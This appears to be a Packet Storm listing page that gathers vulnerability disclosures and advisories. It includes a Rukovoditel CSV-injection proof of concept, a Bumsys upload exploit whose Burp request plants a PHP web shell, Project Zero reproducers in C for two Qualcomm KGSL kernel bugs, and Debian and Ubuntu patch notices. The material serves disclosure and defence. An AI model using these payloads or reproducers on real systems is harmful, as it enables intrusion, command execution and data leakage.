    Exploit Title: Rukovoditel 3.3.1 - CSV injectionVersion: 3.3.1Bugs:  CSV InjectionTechnology: PHPVendor URL: https://www.rukovoditel.net/Software Link: https://www.rukovoditel.net/download.phpDate of found: 27-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================Step 1. login as userstep 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )step 3. Set Firstname as  =calc|a!z|step 3. If admin Export costumers as CSV  file ,in The computer of admin  occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)payload: =calc|a!z|

Rukovoditel 3.3.1 CSV Injection

Bumsys Business Management System version 1.0.3-beta suffers from a remote shell upload vulnerability.

Exploit Title: - unilogies/bumsys v1.0.3-beta - Unrestricted File Upload  
Google Dork : NA  
Date: 19-01-2023  
Exploit Author: AFFAN AHMED  
Vendor Homepage: https://github.com/unilogies/bumsys  
Software Link: https://github.com/unilogies/bumsys/archive/refs/tags/v1.0.3-beta.zip  
Version: 1.0.3-beta  
Tested on: Windows 11, XAMPP-8.2.0  
CVE : CVE-2023-0455

================================  
Steps_TO_Reproduce  
================================  
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)  
- Click on action button to edit the Profile  
- Click on select logo button to upload the image  
- Intercept the POST Request  and do the below changes .

================================================================  
Burpsuite-Request  
================================================================  
POST /xhr/?module=settings&page=updateShop HTTP/1.1  
Host: demo.bumsys.org  
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7  
Content-Length: 1280  
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"  
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA  
Accept: */*  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Platform: "Windows"  
Origin: https://demo.bumsys.org  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.bumsys.org/settings/shop-list/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopName"

TEST  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopAddress"

 test   
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCity"

testcity  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopState"

teststate  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPostalCode"

700056  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopCountry"

testIND  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopPhone"

895623122  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopEmail"

test@gmail.com  
------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopInvoiceFooter"

 ------WebKitFormBoundarynO0QAD84ekUMuGaA  
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"  
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>

====================================================================================  
Burpsuite-Response  
====================================================================================  
HTTP/1.1 200 OK  
Date: Thu, 19 Jan 2023 07:14:26 GMT  
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips  
X-Powered-By: PHP/7.0.33  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>

====================================================================================

VIDEO-POC : https://youtu.be/nwxIoSlyllQ

Bumsys Business Management System 1.0.3-beta Shell Upload

On Qualcomm Adreno/KGSL builds where CONFIG_QCOM_KGSL_USE_SHMEM is not set (or on older KGSL versions without CONFIG_QCOM_KGSL_USE_SHMEM), KGSL allocates GPU-shared memory from its own page pool. Pages from this pool are inserted into VMAs that don't have any weird flags like VM_PFNMAP set, which means userspace can grab extra references to these pages through get_user_pages() (for example, using vmsplice()). But when GPU-shared memory is freed, KGSL puts the freed pages into its own page pool without checking the page refcount. This means that pages that are still accessible from userspace can be reallocated as GPU memory by another process.

    Qualcomm Adreno/KGSL: pages can be freed to page pool while having GPU references [on !CONFIG_QCOM_KGSL_USE_SHMEM][Tested on a Pixel 4 again with a slightly outdated version of KGSL. I ordered a Pixel 5a but don't have it yet...]On KGSL builds where CONFIG_QCOM_KGSL_USE_SHMEM is not set (or on older KGSL versions without CONFIG_QCOM_KGSL_USE_SHMEM), KGSL allocates GPU-shared memory from its own page pool. Pages from this pool are inserted into VMAs that don't have any weird flags like VM_PFNMAP set, which means userspace can grab extra references to these pages through get_user_pages() (for example, using vmsplice()). But when GPU-shared memory is freed, KGSL puts the freed pages into its own page pool without checking the page refcount. This means that pages that are still accessible from userspace can be reallocated as GPU memory by another process. I don't know exactly what the security impact of this is and whether it leads to privilege escalation between userspace processes, but it probably leads at least to data leakage?Testcase that demonstrates cross-process data leakage (in an artificial scenario, between two cooperating processes):#define _GNU_SOURCE#include <err.h>#include <fcntl.h>#include <unistd.h>#include <signal.h>#include <stdlib.h>#include <assert.h>#include <stdio.h>#include <sys/prctl.h>#include <sys/ioctl.h>#include <sys/mman.h>#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})#define KGSL_IOC_TYPE 0x09enum kgsl_user_mem_type {KGSL_USER_MEM_TYPE_PMEM = 0x00000000,KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,KGSL_USER_MEM_TYPE_ADDR = 0x00000002,KGSL_USER_MEM_TYPE_ION = 0x00000003,KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,KGSL_USER_MEM_TYPE_MAX = 0x00000007,};struct kgsl_gpumem_alloc {unsigned long gpuaddr; /* output param */size_t size;unsigned int flags;};#define KGSL_MEMALIGN_SHIFT 16#define KGSL_MEMFLAGS_USE_CPU_MAP 0x10000000ULL#define KGSL_CACHEMODE_SHIFT 26#define KGSL_CACHEMODE_WRITECOMBINE 0#define KGSL_CACHEMODE_UNCACHED 1#define KGSL_CACHEMODE_WRITETHROUGH 2#define KGSL_CACHEMODE_WRITEBACK 3#define KGSL_MEMTYPE_SHIFT 8#define KGSL_MEMTYPE_OBJECTANY 0#define IOCTL_KGSL_GPUMEM_ALLOC \\_IOWR(KGSL_IOC_TYPE, 0x2f, struct kgsl_gpumem_alloc)struct kgsl_sharedmem_free {unsigned long gpuaddr;};#define IOCTL_KGSL_SHAREDMEM_FREE \\_IOW(KGSL_IOC_TYPE, 0x21, struct kgsl_sharedmem_free)void child_func(void) {  int kgsl_fd = SYSCHK(open(\"/dev/kgsl-3d0\", O_RDWR));  for (int i=0; i<10000; i++) {    struct kgsl_gpumem_alloc kga = {      .size = 0x1000,      .flags = (2<<KGSL_MEMALIGN_SHIFT) | KGSL_MEMFLAGS_USE_CPU_MAP | (KGSL_CACHEMODE_WRITEBACK << KGSL_CACHEMODE_SHIFT) | (KGSL_MEMTYPE_OBJECTANY << KGSL_MEMTYPE_SHIFT)    };    SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga));    unsigned long gpuaddr = kga.gpuaddr;    //printf(\"[c] allocated 0x%lx\\", gpuaddr);    unsigned long *map = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, gpuaddr));    map[0] = 0xbbbb000000000000 | (i);    //printf(\"[c] mapped as %p\\", map);  }  printf(\"[c] done with spam\\");  sleep(5);}int main(void) {  setbuf(stdout, NULL);  setbuf(stderr, NULL);  int kgsl_fd = SYSCHK(open(\"/dev/kgsl-3d0\", O_RDWR));  struct kgsl_gpumem_alloc kga = {    .size = 0x1000,    .flags = (2<<KGSL_MEMALIGN_SHIFT) | KGSL_MEMFLAGS_USE_CPU_MAP | (KGSL_CACHEMODE_WRITEBACK << KGSL_CACHEMODE_SHIFT) | (KGSL_MEMTYPE_OBJECTANY << KGSL_MEMTYPE_SHIFT)  };  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_GPUMEM_ALLOC, &kga));  unsigned long gpuaddr = kga.gpuaddr;  printf(\"[p] allocated 0x%lx\\", gpuaddr);  unsigned long *map = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, kgsl_fd, gpuaddr));  map[0] = 0xaaaaaaaa;  printf(\"[p] mapped as %p\\", map);  int pipefds[2];  SYSCHK(pipe(pipefds));  struct iovec iov = {    .iov_base = map,    .iov_len = 0x1000  };  assert(SYSCHK(vmsplice(pipefds[1], &iov, 1, SPLICE_F_NONBLOCK)) == iov.iov_len);  SYSCHK(munmap(map, 0x1000));  struct kgsl_sharedmem_free arg_sf = {    .gpuaddr = gpuaddr  };  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_SHAREDMEM_FREE, &arg_sf));  pid_t child = SYSCHK(fork());  if (child == 0) {    SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));    if (getppid() == 1)      exit(0);    child_func();    exit(0);  }  sleep(1);  unsigned long later_data;  assert(SYSCHK(read(pipefds[0], &later_data, 8)) == 8);  printf(\"[p] read 0x%lx\\", later_data);}Output:$ aarch64-linux-gnu-gcc -static -o kgsl-pool-page-uaf kgsl-pool-page-uaf.c && adb push kgsl-pool-page-uaf /data/local/tmp/ && adb shell /data/local/tmp/kgsl-pool-page-uafkgsl-pool-page-uaf: 1 file pushed, 0 skipped. 80.7 MB/s (704808 bytes in 0.008s)[p] allocated 0x500000000[p] mapped as 0x726bfc4000[p] read 0xbbbb00000000115aThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-05-09.Related CVE Numbers: CVE-2023-21666.Found by: jannh@google.com

Qualcomm Adreno/KGSL Data Leakage

Qualcomm Adreno/KGSL suffers from an unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr().

    Qualcomm Adreno/KGSL: unchecked cast of vma->vm_file->private_data in kgsl_setup_dmabuf_useraddr()[Tested on a Pixel 4 (flame), on the latest update from 2023-02, which self-reports as SPL 2022-10-05, since I don't yet have any newer device with KGSL here - but as far as I can tell from the sources, it should also affect current versions.]The following bug was apparently introduced in https://git.codelinaro.org/clo/la/kernel/msm-3.18/-/commit/7ada2c15e39e5288b67ed5ae94b0a8dcb181b911 as part of the fix for CVE-2022-25743.In drivers/gpu/msm/kgsl.c (on the msm/android-msm-redbull-4.19-android13-qpr1 branch of https://android.googlesource.com/kernel/msm), kgsl_setup_dmabuf_useraddr() (reachable via IOCTL_KGSL_MAP_USER_MEM with KGSL_USER_MEM_TYPE_ADDR) does the following: - look up a VMA by user-specified address (find_vma()) - check that the VMA is not anonymous (vma->vm_file) - check that the VMA does *NOT* belong to KGSL - cast the vma->vm_file->private_data to a "struct dma_buf" [bogus cast]This type-confused pointer is then passed down to kgsl_setup_dma_buf(), which passes it to dma_buf_attach(), which accesses fields through the type-confused pointer.Here's a simple reproducer that confuses "struct dma_buf" with "struct binder_proc" - build it like "aarch64-linux-gnu-gcc -static -o kgsl-vma-type-confusion kgsl-vma-type-confusion.c":#define _GNU_SOURCE#include <err.h>#include <fcntl.h>#include <stdlib.h>#include <sys/ioctl.h>#include <sys/mman.h>#define SYSCHK(x) ({          \  typeof(x) __res = (x);      \  if (__res == (typeof(x))-1) \    err(1, "SYSCHK(" #x ")"); \  __res;                      \})typedef unsigned long binder_size_t;typedef unsigned long binder_uintptr_t;enum binder_driver_command_protocol {  BC_INCREFS = _IOW('c', 4, unsigned int),};struct binder_write_read {binder_size_t write_size; /* bytes to write */binder_size_t write_consumed; /* bytes consumed by driver */binder_uintptr_t write_buffer;binder_size_t read_size; /* bytes to read */binder_size_t read_consumed; /* bytes consumed by driver */binder_uintptr_t read_buffer;};#define BINDER_WRITE_READ _IOWR('b', 1, struct binder_write_read)#define KGSL_IOC_TYPE 0x09enum kgsl_user_mem_type {KGSL_USER_MEM_TYPE_PMEM = 0x00000000,KGSL_USER_MEM_TYPE_ASHMEM = 0x00000001,KGSL_USER_MEM_TYPE_ADDR = 0x00000002,KGSL_USER_MEM_TYPE_ION = 0x00000003,KGSL_USER_MEM_TYPE_DMABUF       = 0x00000003,KGSL_USER_MEM_TYPE_MAX = 0x00000007,};#define KGSL_MEMFLAGS_GPUREADONLY 0x01000000Ustruct kgsl_map_user_mem {int fd;unsigned long gpuaddr;   /*output param */size_t len;size_t offset;unsigned long hostptr;   /*input param */enum kgsl_user_mem_type memtype;unsigned int flags;};#define IOCTL_KGSL_MAP_USER_MEM \_IOWR(KGSL_IOC_TYPE, 0x15, struct kgsl_map_user_mem)int main(void) {  /*   * set up binder a little bit so that its private data isn't full of null   * bytes   */  int binder_fd = SYSCHK(open("/dev/binder", O_RDWR));  unsigned int write_buffer[2] = {    BC_INCREFS, // cmd    0, // target  };  struct binder_write_read arg_bwr = {    .write_size = sizeof(write_buffer),    .write_buffer = (unsigned long)write_buffer  };  SYSCHK(ioctl(binder_fd, BINDER_WRITE_READ, &arg_bwr));  char *binder_vma = SYSCHK(mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, binder_fd, 0));  int kgsl_fd = SYSCHK(open("/dev/kgsl-3d0", O_RDWR));  struct kgsl_map_user_mem arg_mum = {    .len = 0x1001,    .offset = 0,    .hostptr = (unsigned long)binder_vma,    .memtype = KGSL_USER_MEM_TYPE_ADDR,    .flags = KGSL_MEMFLAGS_GPUREADONLY  };  SYSCHK(ioctl(kgsl_fd, IOCTL_KGSL_MAP_USER_MEM, &arg_mum));}When you run this on a Pixel 4, you'll get a splat like this:[   45.744676] Unexpected kernel BRK exception at EL1[   45.744689] Unhandled debug exception: ptrace BRK handler (0xf2005512) at 0xffffff95081fd358[   45.744695] Internal error: : 0 [#1] PREEMPT SMP[   45.744700] Modules linked in: ftm5(O) heatmap videobuf2_vmalloc videobuf2_memops lkdtm adsp_loader_dlkm stub_dlkm usf_dlkm native_dlkm machine_dlkm platform_dlkm wcd_cpe_dlkm wsa881x_dlkm wcd934x_dlkm wcd9360_dlkm mbhc_dlkm wcd9xxx_dlkm swr_ctrl_dlkm cs35l36_dlkm q6_dlkm swr_dlkm apr_dlkm q6_notifier_dlkm q6_pdr_dlkm wglink_dlkm wcd_spi_dlkm wcd_core_dlkm pinctrl_wcd_dlkm msm_11ad_proxy wlan(O) incrementalfs[   45.744735] Process kgsl-vma-type-c (pid: 7371, stack limit = 0x0000000017bcb360)[   45.744741] CPU: 6 PID: 7371 Comm: kgsl-vma-type-c Tainted: G S      W  O    4.14.276-g6ef255005cea-ab9062920 #1[   45.744744] Hardware name: Qualcomm Technologies, Inc. SM8150 V2 PM8150 Google Inc. MSM sm8150 Flame (DT)[   45.744748] task: 000000004f4f2973 task.stack: 0000000017bcb360[   45.744762] pc : osq_lock+0x17c/0x180[   45.744772] lr : __mutex_lock+0x134/0x7d8[   45.744776] sp : ffffff802681bab0 pstate : a0400145[   45.744779] x29: ffffff802681baf0 x28: ffffffdb21200da8[   45.744783] x27: ffffffdaa65e9800 x26: ffffffdaad722c00[   45.744786] x25: ffffff950aa8d000 x24: 000000000013a934[   45.744790] x23: ffffffdac40fda48 x22: ffffffdb6ac56c34[   45.744794] x21: 0000000000000002 x20: ffffffdb6ac56c28[   45.744797] x19: ffffffdac40fda00 x18: ffffffdab6d89458[   45.744801] x17: 0000000000000000 x16: ffffff9508095b90[   45.744805] x15: 0000000000000000 x14: 0000000000000070[   45.744809] x13: 0000000000000007 x12: 00000000ffffffda[   45.744812] x11: ffffff950a6a3028 x10: ffffff950a6aed80[   45.744816] x9 : ffffffdbffbb3d80 x8 : 0000000000000000[   45.744820] x7 : 0000000000000000 x6 : 000000000000003f[   45.744824] x5 : 0000000000000040 x4 : 0000000000000000[   45.744828] x3 : 0000000000000004 x2 : ffffffdac40fda00[   45.744831] x1 : 0000000000000002 x0 : ffffffdb6ac56c34[   45.744837] \x0aPC: osq_lock+0x13c/0x180:[   45.744840] d318  540001c0 f940012d b4fffead aa1f03ee f8ee812d d503201f d503201f d503201f[   45.744848] d338  d503201f b4fffdcd 2a1f03e0 f90005ac f900014d 17ffffdb 2a1f03e0 17ffffd9[   45.744855] d358  d42aa240 f800865e f81f0ffe d001252b d538d088 9100a16b b86b6908 aa1f03e2[   45.744862] d378  11000509 93407d21 aa0003e8 2a0103fe 88befc02 2a1e03e0 6b00013f 54000081[   45.744870] \x0aLR: __mutex_lock+0xf4/0x7d8:[   45.744874] 8b94  b9045a68 35000196 14000030 b9445a68 71000508 540000e1 52b00008 b9045a68[   45.744881] 8bb4  b9445e68 350031a8 b9045a7f 14000002 b9045a68 91003296 aa1603e0 97939183[   45.744888] 8bd4  36000440 f9400281 f27df028 540000c0 eb13011f 540001e1 361001c1 92400428[   45.744895] 8bf4  14000002 92400828 927ef908 aa1403e0 aa130102 aa0103fe c8fe7e82 aa1e03e0[   45.744905] \x0aSP: 0xffffff802681ba70:[   45.744908] ba70  081fd358 ffffff95 a0400145 00000000 00000000 00000000 d0608d00 c7188d35[   45.744916] ba90  ffffffff 0000007f 08c74984 ffffff95 2681baf0 ffffff80 081fd358 ffffff95[   45.744923] bab0  09d18bd4 ffffff95 0841e720 ffffff95 2681bb30 ffffff80 00000000 00000000[   45.744930] bad0  00000000 00000000 00000000 00000000 00000000 00000000 d0608d00 c7188d35[   45.744936][   45.744940] Call trace:[   45.744943] osq_lock+0x17c/0x180[   45.744947] __mutex_lock_slowpath+0x14/0x20[   45.744954] dma_buf_attach+0x78/0x1cc[   45.744960] kgsl_setup_dma_buf+0x5c/0x580[   45.744964] kgsl_setup_useraddr+0x118/0x89c[   45.744968] kgsl_ioctl_map_user_mem+0x210/0x73c[   45.744973] kgsl_ioctl_helper+0x13c/0x194[   45.744977] kgsl_ioctl+0x34/0xf0[   45.744982] do_vfs_ioctl+0x938/0xf3c[   45.744986] SyS_ioctl+0x138/0x16c[   45.744992] el0_svc_naked+0x34/0x38[   45.744997] Code: f900014d 17ffffdb 2a1f03e0 17ffffd9 (d42aa240)[   45.745002] ---[ end trace b07b8661a56776c3 ]---As you can see, dma_buf_attach() is trying to call mutex_lock(&dmabuf->lock) on the type-confused dmabuf pointer, which crashes the mutex implementation.This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-05-09This is QPSIIR-1788."This is A-271879598.bulletin entry:https://source.android.com/docs/security/bulletin/2023-05-01#qualcomm-componentsfix commit:https://git.codelinaro.org/clo/la/kernel/msm-4.19/-/commit/86695e1dd101e71571998281541b0b4378f89414Related CVE Numbers: CVE-2022-25743,CVE-2023-21665.Found by: jannh@google.com

Qualcomm Adreno/KGSL Unchecked Cast / Type Confusion

Debian Linux Security Advisory 5417-1 - Multiple vulnerabilities have been discovered in OpenSSL, a Secure Sockets Layer toolkit.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5417-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
May 31, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : openssl  
CVE ID         : CVE-2023-0464 CVE-2023-0465 CVE-2023-0466 CVE-2023-2650  
Debian Bug     : 1034720

Multiple vulnerabilities have been discovered in OpenSSL, a Secure  
Sockets Layer toolkit.

CVE-2023-0464

    David Benjamin reported a flaw related to the verification of X.509  
    certificate chains that include policy constraints, which may result  
    in denial of service.

CVE-2023-0465

    David Benjamin reported that invalid certificate policies in leaf  
    certificates are silently ignored. A malicious CA could take  
    advantage of this flaw to deliberately assert invalid certificate  
    policies in order to circumvent policy checking on the certificate  
    altogether.

CVE-2023-0466

    David Benjamin discovered that the implementation of the  
    X509_VERIFY_PARAM_add0_policy() function does not enable the check  
    which allows certificates with invalid or incorrect policies to pass  
    the certificate verification (contrary to its documentation).

CVE-2023-2650

    It was discovered that processing malformed ASN.1 object identifiers  
    or data may result in denial of service.

For the stable distribution (bullseye), these problems have been fixed in  
version 1.1.1n-0+deb11u5.

We recommend that you upgrade your openssl packages.

For the detailed security status of openssl please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/openssl

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmR3XbdfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q57RAAnVKJS02ib/Uke98Kia//N7JAweY3jZ5IGluzGqms6di2Z9+1qW/qbjI+  
tGq2HdEd/ujN1+8hLciZN9U12Otkrt+Z//TvIJDBNd12sAiK6w5efVlIhESOW8z+  
nXxDBNsZv4ocqFcdWlXTaE1JQBd4MGULHsrItoczMwL1iiHfuvOxS7XqrttfGK2K  
WlnE3/uzmKJup77u4OnHxicTEaUGesV8fvv2uoI+gxkiQPZbEDLBINClDlhSgAae  
vMhrZrYLwS6vNZOG4fvDheHkd+3jO1YCv+742YeZbEfa6o3RXYGvLzSRNo5MhR/K  
N2/pxTHsRFaPlAxjys1UNGsZsIK7eZR0jyVRrF3PkbMgI4SVEyoqsI19i+viGoHY  
Ih6YkrSFxmQfK+1XDXS4RFOgVN900h4D/V/13udiswHShaFVsf4wu9SagmJtzR7X  
TzsphwZAbvxcqhaKdURgHoXaokMRxlO7vFijB1//Q+/uJJrkpLb+XTkN+SnujCSA  
48tAs3vnv9fki14+B6IQ9Tyg/Obhxk+z5Xb3W6H6xO1IfdmCibBvF77O8Q8uKIhD  
p3yhZeZY0VanKJMxquC3Yi0Ja6wbcJuww33/9/pqpTEdaoOnxb/wXNU0x2wIRBUL  
7IzNcmgVpQ1P3UhM58WZGOUS/0+IAtGfuEzZJiuWWKyV3hFvIEs=XKMH  
-----END PGP SIGNATURE-----

Debian Security Advisory 5417-1

Ubuntu Security Notice 6126-1 - It was discovered that libvirt incorrectly handled the nwfilter driver. A local attacker could possibly use this issue to cause libvirt to crash, resulting in a denial of service. This issue only affected Ubuntu 22.04 LTS. It was discovered that libvirt incorrectly handled queries for the SR-IOV PCI device capabilities. A local attacker could possibly use this issue to cause libvirt to consume resources, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6126-1  
May 31, 2023

libvirt vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in libvirt.

Software Description:  
- libvirt: Libvirt virtualization toolkit

Details:

It was discovered that libvirt incorrectly handled the nwfilter driver. A  
local attacker could possibly use this issue to cause libvirt to crash,  
resulting in a denial of service. This issue only affected Ubuntu 22.04  
LTS. (CVE-2022-0897)

It was discovered that libvirt incorrectly handled queries for the SR-IOV  
PCI device capabilities. A local attacker could possibly use this issue to  
cause libvirt to consume resources, leading to a denial of service.  
(CVE-2023-2700)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
   libvirt-daemon                  9.0.0-2ubuntu1.1  
   libvirt-daemon-system           9.0.0-2ubuntu1.1  
   libvirt0                        9.0.0-2ubuntu1.1

Ubuntu 22.10:  
   libvirt-daemon                  8.6.0-0ubuntu3.2  
   libvirt-daemon-system           8.6.0-0ubuntu3.2  
   libvirt0                        8.6.0-0ubuntu3.2

Ubuntu 22.04 LTS:  
   libvirt-daemon                  8.0.0-1ubuntu7.5  
   libvirt-daemon-system           8.0.0-1ubuntu7.5  
   libvirt0                        8.0.0-1ubuntu7.5

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6126-1  
   CVE-2022-0897, CVE-2023-2700

Package Information:  
   https://launchpad.net/ubuntu/+source/libvirt/9.0.0-2ubuntu1.1  
   https://launchpad.net/ubuntu/+source/libvirt/8.6.0-0ubuntu3.2  
   https://launchpad.net/ubuntu/+source/libvirt/8.0.0-1ubuntu7.5

Source

Packet Storm